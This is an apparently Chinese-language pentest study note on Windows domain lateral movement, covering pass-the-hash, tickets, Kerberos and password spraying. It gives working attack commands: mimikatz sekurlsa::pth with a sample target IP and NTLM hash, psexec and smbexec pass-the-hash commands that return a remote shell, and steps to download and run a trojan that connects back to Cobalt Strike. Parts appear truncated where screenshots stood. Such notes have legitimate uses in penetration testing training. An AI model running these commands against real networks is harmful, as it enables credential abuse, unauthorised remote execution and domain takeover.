内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射

一.域横向pth，mimkatz，NTLM

windwos server 2012 R2之前可能是NTLM和LM，之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator（目标本地用户名） /domain:192.168.3.32（目标ip） /ntlm:518b98ad4178a53695dc997aa02d455c（目标hash）

在执行命令机器弹出cmd窗口

使用该命令进行传递木马

创建bshell：

执行:

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

使用psexec进行hash传递返回被控机器shell终端：

 .\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

上线cs：

1.上传木马到web目录

2.使用cmd下载木马并且执行

使用smbexec进行传递

.\smbexec.exe  -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo（高权限，需要NTGM）